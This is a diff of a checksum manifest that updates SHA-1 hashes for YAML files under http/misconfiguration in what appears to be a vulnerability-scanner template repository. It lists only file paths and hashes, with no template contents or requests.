http/misconfiguration/aem/aem-bg-servlet.yaml:9cc55a653b7d96eeaa453b1020d64c0e399f2dad http/misconfiguration/aem/aem-bulkeditor.yaml:9458afe30af20cafecc274657b5b28376882cbe5 http/misconfiguration/aem/aem-cached-pages.yaml:378f9590b8bf896b09d6b20bcff19fe117f24cf2 -http/misconfiguration/aem/aem-childrenlist-xss.yaml:865e9155cd7b13675736e59497f7ac8dbbd21983 +http/misconfiguration/aem/aem-childrenlist-xss.yaml:73d010e5279b893a5ecd90d7d82c0963557dceee http/misconfiguration/aem/aem-crx-browser.yaml:8d0d989f661a8a9cfa5b968ea8a3cfd630a833eb -http/misconfiguration/aem/aem-crx-bypass.yaml:488da8bd56ec9510905feebdb639a63f0882a1b6 +http/misconfiguration/aem/aem-crx-bypass.yaml:2bb312d155ca515a82b2ee25226bced2f5a132ca http/misconfiguration/aem/aem-crx-namespace.yaml:5ff1ce56cd96263d699e32c082fc96dbc45b240b http/misconfiguration/aem/aem-crx-search.yaml:a1c33c2ccc5e4b2231ae3ca690ac8c7de4a1fab9 http/misconfiguration/aem/aem-custom-script.yaml:b6e5682abaa0a8520155f9bd276fa1116ec263d7 @@ -3918,7 +3918,7 @@ http/misconfiguration/aem/aem-dump-contentnode.yaml:033ad37803e934d4baa6db23bc68 http/misconfiguration/aem/aem-explorer-nodetypes.yaml:7471d936350e616e9e7bbdafb846b5933cc72df6 http/misconfiguration/aem/aem-external-link-checker.yaml:2c8e53bcb1fbfc22302d0b7e0b983f01ca2e141e http/misconfiguration/aem/aem-gql-servlet.yaml:78e6be2ea486a9b41bf5e548905a2cf161f6d09f -http/misconfiguration/aem/aem-groovyconsole.yaml:a6fb745f754a0a65721c409a002595d100ba12fd +http/misconfiguration/aem/aem-groovyconsole.yaml:1c04447ab4ae468992880ba11b0907a24b6b82d7 http/misconfiguration/aem/aem-hash-querybuilder.yaml:5e9e28f543609a9589635cb898def874dd3dfaf8 http/misconfiguration/aem/aem-jcr-querybuilder.yaml:6dd0c6cfe7121fb342131f1e6d49881498a1efd7 http/misconfiguration/aem/aem-login-status.yaml:c294ba77ff75f614c8bc65df05166a11dfed1525 @@ -3931,18 +3931,18 @@ http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml:2e8f661e74ece http/misconfiguration/aem/aem-querybuilder-json-servlet.yaml:0b898cc947638f4475f337d8b548931a5247b20a http/misconfiguration/aem/aem-secrets.yaml:033083bf6990af07870e13e0b1b79f08c1c04ff7 http/misconfiguration/aem/aem-security-users.yaml:7d1e1b509a43c14a29396333ac4af0e5d117bc1b -http/misconfiguration/aem/aem-setpreferences-xss.yaml:8a88405c9aacffa782b3acaab4f21edb9c4b3b4f +http/misconfiguration/aem/aem-setpreferences-xss.yaml:32df4b80da844c002d44cafa7cdba954fbcfba5c http/misconfiguration/aem/aem-sling-userinfo.yaml:e5934b740260d6d78dc98cf90a0f308bac69cc7b -http/misconfiguration/aem/aem-userinfo-servlet.yaml:26af1f31bc2bd6f2c0143c12704cb5eb5a30517e +http/misconfiguration/aem/aem-userinfo-servlet.yaml:a2668d1d001615a2503a11df1c75842179137d67 http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:c47109210b8e0ddeb25e51d2cb74878f0399d168 -http/misconfiguration/aem/aem-xss-childlist-selector.yaml:59bb24a67f48312e2a16fc8f9f0245297b4f190b +http/misconfiguration/aem/aem-xss-childlist-selector.yaml:40ef39a912ac83b3a03209bebfe4f0b0dbdffca6 http/misconfiguration/airflow/airflow-debug.yaml:d27b2bfa9a7e5627dc370a58b3029abd022b1426 http/misconfiguration/airflow/unauthenticated-airflow.yaml:71d0a8796187d81ce599235847b1407c8e22efab -http/misconfiguration/akamai/akamai-arl-xss.yaml:4cd3df9a592a9b6215784bb482b649dcb35ddefe -http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml:008e85eb5567d1379749d515dbd8425a1a10c054 +http/misconfiguration/akamai/akamai-arl-xss.yaml:1ae850c78907440dec27a902ef9feee002dec7b6 +http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml:2aaa06e87f3bdc415eb90b5daedabe7cea7f3085 http/misconfiguration/alibaba-mongoshake-unauth.yaml:9443c71a6a31261b0f2c48411afbd33b9d55f793 http/misconfiguration/ampache-update-exposure.yaml:d93e7134fd67d9baca3f51fd61bd4e3cdafccde5 -http/misconfiguration/ampps-dirlisting.yaml:982e53209ce4dee232ae334802e91796fa74772d +http/misconfiguration/ampps-dirlisting.yaml:8790c3c62f25ed7b1e79887c60d85ef55035d92a http/misconfiguration/android-debug-database-exposed.yaml:c6e2660f8da2b895ce695e0482f6c36ceca8ca61 http/misconfiguration/apache/apache-filename-enum.yaml:85a6708476a1ce4dae2fbb03fcb70fe82a756b36 http/misconfiguration/apache/apache-hbase-unauth.yaml:9b423614dad084bca22878d48987c6355e749293 @@ -3950,7 +3950,7 @@ http/misconfiguration/apache/apache-nifi-unauth.yaml:c4b5d125120c2b1614e78b978cf http/misconfiguration/apache/apache-storm-unauth.yaml:ec48391d69726d11a50250d901a5f6ca1568fd66 http/misconfiguration/apache/apache-zeppelin-unauth.yaml:2a441f5be73b1674fec1a40096ebdb0dcb115e10 http/misconfiguration/apache/kafka-manager-unauth.yaml:4164e70b56cc9063edd555b9331ac3bb12aa7f05 -http/misconfiguration/apache/tomcat-pathnormalization.yaml:bad091d1ac53098e32318132df2fa339c90e6dcf +http/misconfiguration/apache/tomcat-pathnormalization.yaml:093e64ae7d21d39e2935abfa4ec0d95243f89236 http/misconfiguration/apache-drill-exposure.yaml:792715f62979f623e4e1d8cd0ed034ff2eb01afc http/misconfiguration/apache-druid-unauth.yaml:f733c030df890a6861a1ae3660266e07c762298e http/misconfiguration/apache-impala.yaml:8d74afa76cb797f3a7bf3c986631d7e93bd3487b @@ -3964,15 +3964,15 @@ http/misconfiguration/atlassian-bamboo-build.yaml:71cb19c46cafbebd7533e98b88d452 http/misconfiguration/aws-ec2-status.yaml:f52f9d1feaf736a3728ae0c95d266d575fad9b77 http/misconfiguration/aws-object-listing.yaml:56e839cf2c6295357e747db2028d4a28a84f60f0 http/misconfiguration/aws-redirect.yaml:4ed240934eb9c67becc2ab090ce768f9c05376c9 -http/misconfiguration/aws-s3-explorer.yaml:d469f865c937b7091ea892357924bd18a112c1ae +http/misconfiguration/aws-s3-explorer.yaml:960a58b92de23a0a68fbe88d8138e8bc045470d3 http/misconfiguration/aws-xray-application.yaml:d2e6d1d3565995c552f043c019de44a454e920ae http/misconfiguration/awstats-listing.yaml:cefec72eb3bf609f09779109eef39dfa9e62795b http/misconfiguration/bitbucket-public-repository.yaml:3ae328db3b76977394dca6df4b06d9d1a2402223 http/misconfiguration/blackbox-exporter-metrics.yaml:23bbd2929451b68aa7b0059bd18ba51643a41285 -http/misconfiguration/bootstrap-admin-panel-template.yaml:e0a8f253df0d0977c3445b31f8e5c30c7d98e94b +http/misconfiguration/bootstrap-admin-panel-template.yaml:01cca0503a1b23ed01e57d24b98bc4c1c67712f4 http/misconfiguration/bravia-signage.yaml:112b33d9332d3e80f0871c37adf7f3736d986d0f http/misconfiguration/browserless-debugger.yaml:a3a45ae884e34deb54c96476f31141b5338cd4f8 -http/misconfiguration/cadvisor-exposure.yaml:b474265e13c72987988f727798d64cfcdd02494c +http/misconfiguration/cadvisor-exposure.yaml:7c087da24b9bab3e79ddabea84414c9f4b75fc28 http/misconfiguration/cgi-test-page.yaml:a4912db83100bdde0dd7e52454da25c7c716dbb3 http/misconfiguration/clockwork-dashboard-exposure.yaml:e05c36e876b9bd13b7f444195bcd02e83068a3d0 http/misconfiguration/cloud-metadata.yaml:8778d2ecf82407b77b95a567d76fbd40a8d11e94 @@ -3983,20 +3983,20 @@ http/misconfiguration/codeigniter-errorpage.yaml:97f2f5b97183a0fc700e723bdac5f59 http/misconfiguration/codemeter-webadmin.yaml:3ad9e6225800a6a4213d5deaab056aec3df3a4f4 http/misconfiguration/codis-dashboard.yaml:7bf49a01e5f1776e0d0e1153a56a61b3960d508a http/misconfiguration/collectd-exporter-metrics.yaml:a2575837ed3981258169c7797e69b036f716cc61 -http/misconfiguration/command-api-explorer.yaml:2c5cc02b27bed87f7c37d8d2c9d3a1fcf7b667bc +http/misconfiguration/command-api-explorer.yaml:21fd90bd71b594ff527240b6ec9885acf0e5da52 http/misconfiguration/confluence/confluence-oauth-admin.yaml:740fe13817c58676841d182ad4aabd76493786e6 http/misconfiguration/confluence-dashboard.yaml:e853ef299dc09722905bec740eb0710b7d808dac http/misconfiguration/corebos-htaccess.yaml:6b6045e93706ed3c1e294f71208a9681c999e9d3 -http/misconfiguration/cx-cloud-upload-detect.yaml:ebf9a69f779537d15193a3e0f99993dc32909f7d -http/misconfiguration/d-link-arbitary-fileread.yaml:645e9481cbe2312c1e131b0550ba4a6681400371 +http/misconfiguration/cx-cloud-upload-detect.yaml:3f356265b208f02da78aa4db8ae4b9087ab28a54 +http/misconfiguration/d-link-arbitary-fileread.yaml:6aa074ee36bfc9871a6dbbfdc909c007a12aee91 http/misconfiguration/database-error.yaml:550eeb12f2bd5b99a600e04ff12de1357ccdb6c1 http/misconfiguration/debug/ampache-debug.yaml:f821e8ca3af7b0fda21962a838544e77870f88b4 http/misconfiguration/debug/bottle-debug.yaml:b8efae2083f412d6bebab2de14f26fcf932f5641 http/misconfiguration/debug/flask-werkzeug-debug.yaml:a3dce5e0ef737aca35ccd245baba02cee966eff6 http/misconfiguration/debug/github-debug.yaml:ecf98218fcacdac655b557121fcf3715e4bb8159 http/misconfiguration/default-spx-key.yaml:b8815c33c65aa92ff896625d5fa8a322296205e6 -http/misconfiguration/deos-openview-admin.yaml:cb455fcd16c850e2b1c940f219de28be818852d7 -http/misconfiguration/dgraph-dashboard-exposure.yaml:21d37e015cbf046ed2ace3d9c3e980364bad8cc1 +http/misconfiguration/deos-openview-admin.yaml:98fab8d75655a1d6b6ea59eaa4a3f6ac2e35eb40 +http/misconfiguration/dgraph-dashboard-exposure.yaml:8a76047999244d497136d4c8fd1261e7283e3f75 http/misconfiguration/django-debug-detect.yaml:e95386d63f75c688974f558c12b9c88e7e2f3b32 http/misconfiguration/docker-registry.yaml:3e6795cfc6060e9f44d0983e4ab4b91708211b07 http/misconfiguration/docmosis-tornado-server.yaml:de29fa477373aa022f20a04fa9ac1f247979e2e5 @@ -4007,23 +4007,23 @@ http/misconfiguration/dynamic-container-host.yaml:8e3f4990d7239ef14b1fec4ec2af9b http/misconfiguration/ec2-instance-information.yaml:6293ca79638118a5c045fd01b5c3bcd9e5523ee3 http/misconfiguration/elastic-hd-dashboard.yaml:c6255bd33a31115ce354696c6602a8095b6159e4 http/misconfiguration/elasticsearch.yaml:cd15f2d154ebdb121f42308ed560d3f11e4ba02a -http/misconfiguration/encompass-cm1-homepage.yaml:4e110a936d0c8ab5b433fdee7f01f04f70440d1d +http/misconfiguration/encompass-cm1-homepage.yaml:e771b8fd9431037d08c0407ec060ace221c347c7 http/misconfiguration/envoy-admin-exposure.yaml:62aca142bd81e2a80209de0df51138a6d8444ed5 http/misconfiguration/espeasy-mega-exposure.yaml:b55e697e0bdd7705ace1a06db669b61bef32c15f http/misconfiguration/esphome-dashboard.yaml:f2be2bbc61c076b33b70e16477443a6ea90f213a http/misconfiguration/etcd-unauthenticated-api.yaml:91d4808cda8443ed1cd7e8934448d3bd65d23b58 http/misconfiguration/everything-listing.yaml:ac3d1e9f17af9dc98f82ef9462d565e427870eee http/misconfiguration/exposed-docker-api.yaml:1bdaabbd85e76690255a305ac6442b16e537d7b7 -http/misconfiguration/exposed-jquery-file-upload.yaml:b02ab6d6d2516638e484ed8ce5376c975ff75dab +http/misconfiguration/exposed-jquery-file-upload.yaml:42e4a95ff4bda8f8456133a5c5ed6c5d9001c442 http/misconfiguration/exposed-kafdrop.yaml:2d98c9a998fbf41f40b2926cbf67e9e29ad57ce6 http/misconfiguration/exposed-kibana.yaml:6528f0e7babf81b8f71798dadea5150119784900 http/misconfiguration/exposed-service-now.yaml:911c997fbb6a866aa14121d349630170a3baa509 -http/misconfiguration/exposed-sqlite-manager.yaml:7403a0849ca8cea0dcf63e664e0f574c9104c4a8 +http/misconfiguration/exposed-sqlite-manager.yaml:51b4fcb443d5a567e713cca8dcd486bcf5426999 http/misconfiguration/express-stack-trace.yaml:f87f460eb04297d0ecc7e6fd0ee04502880e6064 http/misconfiguration/flask-redis-docker.yaml:4ebb9f69d955ee1e0b71cf14d41f5f977106f642 http/misconfiguration/formalms-install.yaml:3146478146f106551371ec66ec86e7ad3c3022a3 http/misconfiguration/front-page-misconfig.yaml:7baa1afa482ebcacffaed682c39ecfbb91cbf6fd -http/misconfiguration/ganglia-cluster-dashboard.yaml:a065363e9259aab0d49bddb760688cfda669b9a7 +http/misconfiguration/ganglia-cluster-dashboard.yaml:6b2464789a8985577389d1dedf5cd5804a46a001 http/misconfiguration/genieacs-default-jwt.yaml:8bd6683d4adc6ee59444e52314b1b04c382750f0 http/misconfiguration/git-web-interface.yaml:1415ab5a2d5a170516d1c155317e33b6ec77dca0 http/misconfiguration/gitea-public-signup.yaml:c076527b0e1e9496ade22db8a21ba4374545a0f3 @@ -4048,9 +4048,9 @@ http/misconfiguration/graphql/graphql-field-suggestion.yaml:0fc72f273bda769a74fa http/misconfiguration/graphql/graphql-get-method.yaml:16a190b2aa57a7745814b4f8cb7d86e83475bb35 http/misconfiguration/graphql/graphql-playground.yaml:791736c821562ea09fef7b49bd146de709c47ec1 http/misconfiguration/grav-register-admin.yaml:0fb74fd43e0989fe5d44de307953cc971cf557f9 -http/misconfiguration/hadoop-unauth-rce.yaml:d2f06bc5dcdfa0c5c407f992de413793b04190e1 +http/misconfiguration/hadoop-unauth-rce.yaml:79392b8e1b208bce3ac1220d76d12a5a9041c0d6 http/misconfiguration/haproxy-exporter-metrics.yaml:ebbcace5d5db08606a496ca438e4e6cce7a0fdcb -http/misconfiguration/haproxy-status.yaml:edbb1bd2b858fb255495420b5c3aa5ce8725a749 +http/misconfiguration/haproxy-status.yaml:287915ca8d57ae1a5cf6e6ed36ec9804bf58dc86 http/misconfiguration/healthchecks-ui-exposure.yaml:3018bee44918e5ef5e55a6902b43969486701fa4 http/misconfiguration/hfs-exposure.yaml:68b2179c49b5a3051cb58742869803f0a521c385 http/misconfiguration/hivequeue-agent.yaml:a444969d972e8def5e7eb4061b39fdc04c552ea4 @@ -4065,11 +4065,11 @@ http/misconfiguration/iis-internal-ip-disclosure.yaml:bd8ba07fe291bb84914ed2b33c http/misconfiguration/installer/acunetix-360-installer.yaml:08978fd91dcf0249d0d50ec692ea165e73a1342d http/misconfiguration/installer/ampache-music-installer.yaml:28e4b0bedc08cbf5210559e43f440e444ad35820 http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml:46a5c397b2f9d57c2d7a7b8f2e3423835cc75d80 -http/misconfiguration/installer/avideo-install.yaml:f5a5b98e16e8c3b61022917d114c9584854738bc +http/misconfiguration/installer/avideo-install.yaml:98964c7f04afc20db0e4b56e508439b7b596cd26 http/misconfiguration/installer/bagisto-installer.yaml:f33130e67be12f52d3e719eba69c9bcf02cf8b19 http/misconfiguration/installer/binom-installer.yaml:5a0bda002247c3c4f299124b776e7de31d4ff5ca http/misconfiguration/installer/blesta-installer.yaml:9bb3ce964212c9aeae365fe58ca43104b3ee2006 -http/misconfiguration/installer/circarlife-setup.yaml:76568de85707d9df196dd07cd21a3f64d2827cc2 +http/misconfiguration/installer/circarlife-setup.yaml:2e1e2902cfeeb14c1ad2193c41f458af2347e092 http/misconfiguration/installer/cloudcenter-Installer.yaml:d0a27daa30662ca704278975f2d42cb0674fe479 http/misconfiguration/installer/codeigniter-installer.yaml:b6bb44771d370c762ee7949160cad9898b995fb3 http/misconfiguration/installer/concrete-installer.yaml:1473d93c26ed6990dfefc20fe4556dea7449d8e1 @@ -4082,7 +4082,7 @@ http/misconfiguration/installer/eshop-installer.yaml:9a4171cee310d35fb79c45e5914 http/misconfiguration/installer/espeasy-installer.yaml:a5b7bca27435a71326f650190739c4c5e6dea4ef http/misconfiguration/installer/facturascripts-installer.yaml:02d94e59d0f49194d545a53396f455945760f85e http/misconfiguration/installer/geniusocean-installer.yaml:5c41a8624d2daf80af4cbdd2fe84f69c05b42c7c -http/misconfiguration/installer/getsimple-installation.yaml:4632bbae55daeb2c0ca75e3348de9af1525da319 +http/misconfiguration/installer/getsimple-installation.yaml:62fdd26ce8555b9fb8ef6435ed25c97e2f8e7199 http/misconfiguration/installer/gitea-installer.yaml:30a0dc762499cbfb1c8ac2d1b3dfeb0148a619e5 http/misconfiguration/installer/gogs-installer.yaml:e4b17e837c63e9fc4d08c858d653c60d6aabf2c3 http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2502bd4a40039ff5c1991 @@ -4096,7 +4096,7 @@ http/misconfiguration/installer/magento-installer.yaml:c6e440e4873876f64c732177f http/misconfiguration/installer/magnolia-installer.yaml:6a646973b2b9be72f9eea240e61473bc76657138 http/misconfiguration/installer/matomo-installer.yaml:11b8fc5a1e88dd75aedcacd4d062f84ec57b533d http/misconfiguration/installer/mautic-installer.yaml:27560145f4bac624acc11e51ab63162348de5beb -http/misconfiguration/installer/mcloud-installer.yaml:2655d701537e75cf825d0c2b18e2cb310964be44 +http/misconfiguration/installer/mcloud-installer.yaml:8c1d60036ce1231c7fcb0ed69e47788209727f8a http/misconfiguration/installer/metaview-explorer-installer.yaml:89277e9c20f8bfb7f2a5241bd16d8bdb80ad3443 http/misconfiguration/installer/monstra-installer.yaml:0ad9a2c754cec2d81681033d85e96c1c6a3cbb66 http/misconfiguration/installer/moodle-installer.yaml:ccbd571474cf9ee865838ffca86697ba5fce3e4a @@ -4104,9 +4104,9 @@ http/misconfiguration/installer/nagiosxi-installer.yaml:9050b85b384d3331465d9531 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:d9b8f35bbf44d181d40330a9676fa305de9d8b95 http/misconfiguration/installer/nginx-auto-installer.yaml:a45c4bc03311eb33170957d65fa62b0a194427d6 http/misconfiguration/installer/nodebb-installer.yaml:7a5df25da7163e43f58532154f602652d0b013cc -http/misconfiguration/installer/nopcommerce-installer.yaml:175c8c9d4976771f3e860bae45615c35841b7ee2 +http/misconfiguration/installer/nopcommerce-installer.yaml:4568895e83d6888dd2e4eefb6df641258b227f79 http/misconfiguration/installer/openmage-install.yaml:4aa42695d5062c627d4290348a5459f57ecf5a14 -http/misconfiguration/installer/openshift-installer-panel.yaml:89b40fe722408c5942f57c4da57704f0df8964eb +http/misconfiguration/installer/openshift-installer-panel.yaml:d8a752d34b8064b82613b1fdd6c70c3dc16bb6ff http/misconfiguration/installer/opensis-installer.yaml:b2b80ff3af51a7ccc9f2f70da8853f4a4ac0b85a http/misconfiguration/installer/orangehrm-installer.yaml:574bc86b3623ef066660207d8242072b670ebcfd http/misconfiguration/installer/owncloud-installer-exposure.yaml:fcbb996a97f967b3212e064267d1a64eb724d2fd @@ -4138,27 +4138,27 @@ http/misconfiguration/installer/uvdesk-install.yaml:320a11b9cea52323a096a72743f4 http/misconfiguration/installer/vtiger-installer.yaml:076b0cac3812089d8b473161c128f1a51a850e4f http/misconfiguration/installer/webasyst-installer.yaml:45036a303e7bd289c6dee8ee6ccbaafcc78a9e1a http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756dbde108aeb4927 -http/misconfiguration/installer/wp-install.yaml:cceeec383507590bd019c5f9da6de77c725afda2 -http/misconfiguration/installer/zenphoto-setup.yaml:77adefadea89cca423b2f375b41eaf99f8e0ea86 -http/misconfiguration/iot-vdme-simulator.yaml:6769c64d1927c4686a8b6c1235c6ce48e5ffbd93 +http/misconfiguration/installer/wp-install.yaml:7263f4ac7377b12614b0480f0da9c47264a8854e +http/misconfiguration/installer/zenphoto-setup.yaml:9730edcaf481dd4e868f956e698001f4bdf268ed +http/misconfiguration/iot-vdme-simulator.yaml:20c893d91d0de38290ec70c12bb5003944c68f84 http/misconfiguration/jaeger-ui-dashboard.yaml:efec14b7239b7f4eff7378c2952dba84a6e9e112 http/misconfiguration/java-melody-exposed.yaml:33c8f43e9c353a14664f069856e87c5b82174552 -http/misconfiguration/jboss-status.yaml:75178b77cb67eaa314f18aa527d2d2fd65a5d0d7 +http/misconfiguration/jboss-status.yaml:0ae3d74df5e5f57ed9f5eedab57da2ca5ff70a38 http/misconfiguration/jboss-web-service.yaml:d231a296121beabbf9dbde3e5be75d3b574b2092 http/misconfiguration/jenkins/jenkins-openuser-register.yaml:ec2082d6058f4ece4d1ae40dede0ada1072ecb9c http/misconfiguration/jetty-showcontexts-enable.yaml:188720b15a7b5d97cf4ac43c613d830916cc7521 http/misconfiguration/jolokia/jolokia-info-disclosure.yaml:690540e59f5e146d370c0b473dcc9214fe4fdf8f http/misconfiguration/jolokia/jolokia-list.yaml:fe9429754e230c618c19f4adc23cad813f866828 http/misconfiguration/jolokia/jolokia-mbean-search.yaml:81276563cebea7f79f17fa1dc805b497653d31e2 -http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml:d9c27cc81efbcecac519b76ade043541fa408e10 -http/misconfiguration/jupyter-ipython-unauth.yaml:7efba6cf53e509d4cf51b5b90ad43b61d8183a6e +http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml:4f3a828c7adcd96e02f09a11ae67ec03ad693d88 +http/misconfiguration/jupyter-ipython-unauth.yaml:6ac08fdbe3941d53a688a91bf38489fe98d7796f http/misconfiguration/jupyter-lab-unauth.yaml:b550a9f5357574509564c0e86ccc938f7a06c508 http/misconfiguration/jupyter-notebooks-exposed.yaml:aa2e7822ab7f97dae8e3e6a6d99227b143e58c6a http/misconfiguration/kafka-cruise-control.yaml:fdfc82fa91518cbf7f33b126a2467d9e7888c36a http/misconfiguration/kubeflow-dashboard-unauth.yaml:4f32a4b55ac722a5fdfb3b053e7e0abd29f26fbd http/misconfiguration/kubernetes/kube-state-metrics.yaml:c979e984cd5bfc6b3fc6887230c34cbc6b6af304 http/misconfiguration/kubernetes/kubernetes-metrics.yaml:c6a15a9de63fe31f4e539a9194aae89f39cb07fb -http/misconfiguration/kubernetes/kubernetes-pods.yaml:271e139cff1b28bf23168c7f385c90a6591fca05 +http/misconfiguration/kubernetes/kubernetes-pods.yaml:d7e882ec52310bf21ba4607332277bce6575552a http/misconfiguration/kubernetes/kubernetes-resource-report.yaml:148fe36fa427e3847aa5bb1b1d06cea0cddf0788 http/misconfiguration/kubernetes/unauth-etcd-server.yaml:09fa1ece84cc699cc63700e681acfeec540ed171 http/misconfiguration/laravel-debug-enabled.yaml:d5c61627ffc6311ffe3ad85727c090ad2334fdc5 @@ -4175,13 +4175,13 @@ http/misconfiguration/locust-exposure.yaml:879e0cf501e075b201fef057ca84e2b4f4483 http/misconfiguration/lvm-exporter-metrics.yaml:6c4969c2057c4d8223d1eed2a8c214730efb1f74 http/misconfiguration/manage-engine-ad-search.yaml:5c60f797fad0f82038da34924ab7a6b25263fc12 http/misconfiguration/misconfigured-concrete5.yaml:fbd7e1060eeb23bec6e4331af978576619e8a704 -http/misconfiguration/misconfigured-docker.yaml:2bef55d681dbce2029c69b355a22077569fcc115 +http/misconfiguration/misconfigured-docker.yaml:3ba99bbaca7efee00abd6078950a59b3299f343f http/misconfiguration/mlflow-unauth.yaml:cbfaa296c93b75f1600826d43bac22f2eed987ba -http/misconfiguration/mobiproxy-dashboard.yaml:06aca093a37f1edafb48bf3deaf993188afdb87b +http/misconfiguration/mobiproxy-dashboard.yaml:7fe5870248fcc329ad913e20e2877d7895afe762 http/misconfiguration/moleculer-microservices.yaml:504cfc24010ed454d66e014e62e280feee68d516 -http/misconfiguration/mongodb-exporter-metrics.yaml:33ca8a0d5d60962ac9c406f78a7f75bac3b1057e +http/misconfiguration/mongodb-exporter-metrics.yaml:d98f2aede304f7462730fd61743fc0dff017aa5f http/misconfiguration/multilaser-pro-setup.yaml:ee5a7afe337aa891ced4039755cb587246e67057 -http/misconfiguration/mysqld-exporter-metrics.yaml:54cce7be2e1039b6eeec7113fe8f54d45bb3360f +http/misconfiguration/mysqld-exporter-metrics.yaml:c4eeb835f1751609aca35011a762faa1a2fa39f2 http/misconfiguration/nacos-authentication-bypass.yaml:0563da3bf8c47700170d9bbf77effe33b7602092 http/misconfiguration/namedprocess-exporter-metrics.yaml:0c7cf7b10c1b8aba887b58872878a69b22598f5c http/misconfiguration/nextcloud-install.yaml:979b190886782e690c584789c104dd1ad716be5c @@ -4189,81 +4189,81 @@ http/misconfiguration/nginx/nginx-status.yaml:6d4aeeb08f9a6bc87bb62744a580a7d29d http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml:23d4577f5e236ddd7ab8132b4bdf7d2cc4c206cc http/misconfiguration/ngrok-status-page.yaml:0979058334ddddc85cbe4c3ee05f955c326a4145 http/misconfiguration/node-exporter-metrics.yaml:b40af8e8b5faf06a8a1b05b0a8add99f8ac8e08e -http/misconfiguration/nomad-jobs.yaml:77690d3a1176cd31b756cdee591b4c18e7e071ce +http/misconfiguration/nomad-jobs.yaml:8a29aed218e809ca9654e0fb789af7e05290c568 http/misconfiguration/ntop-panel-exposed.yaml:389ab249b9e71fd45e7cc58a7c35244f9eb1f222 -http/misconfiguration/ntopng-traffic-dashboard.yaml:b09ba6388a5425b6722bb49ecde7ad16f8784079 +http/misconfiguration/ntopng-traffic-dashboard.yaml:078244ee28195662b73c23811274dccf2160d0b3 http/misconfiguration/odoo-unprotected-database.yaml:84dc86cef74f22458ce1aaa3760dc5a4b665b771 -http/misconfiguration/office365-open-redirect.yaml:0c1b12b66b597e8284cfb2959c76f87a1ce8584f -http/misconfiguration/oneinstack-control-center.yaml:a2bc853b75f313d36ee57e710fa9834e958587aa -http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml:df0fbc13935c2cbcd2ed1859cc52b5810085ea59 -http/misconfiguration/openbmcs/openbmcs-ssrf.yaml:d819e84cbb29a4837fa02aabf09b0d3ff6f28551 +http/misconfiguration/office365-open-redirect.yaml:70d4cc9755c60aa69d94fd74af70cf6520c1b4a4 +http/misconfiguration/oneinstack-control-center.yaml:84e5fdf406c827ce1d1295594a43dbbcfb660761 +http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml:d3929cb394331e14e682f53ed8b919b641c398f7 +http/misconfiguration/openbmcs/openbmcs-ssrf.yaml:7794c406a60e88bd8b186ef5690af90b882cf076 http/misconfiguration/pa11y-dashboard.yaml:e23d85a4a1bdbaff222f11cc73d9f2a9049e1661 http/misconfiguration/pcdn-cache-node.yaml:1d1335fe30f43e57bf9fc687546b663d2e2e2b89 http/misconfiguration/perfsonar-toolkit.yaml:a60dc07b4b9012f7ac0788468f48e1118e1ad86a -http/misconfiguration/pghero-dashboard-exposure.yaml:0b87b3896e7066e1e5df5cd8d6657bce42f18c55 +http/misconfiguration/pghero-dashboard-exposure.yaml:302455cd1fdb42ea778eb0a5d9c61e867d1f1488 http/misconfiguration/php-errors.yaml:db6a41c553d62d223cf3d58da3fd03788edcb79c http/misconfiguration/php-fpm-status.yaml:c2dca5dc419e4106d552e57ea0c073287081e84e http/misconfiguration/php-src-disclosure.yaml:8dadebdeb2f67c7138041e1675dfae7f43a48b3e http/misconfiguration/phpcli-stack-trace.yaml:73350b723d7813e02ead34701c1ca7e659347644 http/misconfiguration/phpmemcached-admin-panel.yaml:cefd28e84c200e8de48a426caf1ab28ca97e2350 -http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml:75d60dd180db5023e5ada989177be14f289cd2d1 -http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml:1deb52a958eb06afd730305174655379e8fa59ce +http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml:6260bca42d772f4b283374fddbabdd68bdd72117 +http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml:444abd6b420730b8d385cc1fcd1d19c8d1ca42e0 http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml:89f77d6a91231e1658702e548cf03f414b1c3c73 http/misconfiguration/phpnow-works.yaml:74b19a2efc60d0024415e34b7ccea5602932c21e http/misconfiguration/pinpoint-unauth.yaml:9b33693c248b53f3a543e48a8a40b46f7f8b814a http/misconfiguration/postgres-exporter-metrics.yaml:f2ac2e239db3589f475c92bda327d06193d8ddf3 http/misconfiguration/private-key-exposure.yaml:aebb6ee88bb90a686e17493ab5c7c584851bfdfa -http/misconfiguration/prometheus/prometheus-config.yaml:f287655e60894a31cad934d19de88efd8f0581dd +http/misconfiguration/prometheus/prometheus-config.yaml:ed0f839e22a8ae8efabf2dbf34c93633b2ca09a7 http/misconfiguration/prometheus/prometheus-exporter.yaml:646c81dce16537348fa87f8ffe2ef274e8cd0f0a http/misconfiguration/prometheus/prometheus-flags.yaml:e04310b35c6ec968ea136ff417a0cff8a30eda97 http/misconfiguration/prometheus/prometheus-log.yaml:6aa685306cfc6f3045f05ffc7586c0601ece6ae5 http/misconfiguration/prometheus/prometheus-targets.yaml:0604bb73dc30efb5bac0d11b43963ee438487420 -http/misconfiguration/proxy/metadata-alibaba.yaml:ba1dd0862f0b2b6bca8e88ce724fcb64ab1f7911 -http/misconfiguration/proxy/metadata-aws.yaml:24bbdfe2d62ba9d9dd757c866892fefcbfd9a9fd -http/misconfiguration/proxy/metadata-azure.yaml:b7651276f7a1316b7e9ee10d1977e61bdc26a9a0 -http/misconfiguration/proxy/metadata-digitalocean.yaml:41276b057ad56ad2eeb95acd02ed58e0c7fc6a1b -http/misconfiguration/proxy/metadata-google.yaml:f3ce729384eba1a220c57a7b133254fb9a0424b2 -http/misconfiguration/proxy/metadata-hetzner.yaml:9d34c02b8d54696e4f3297f36d7bad54babc6f19 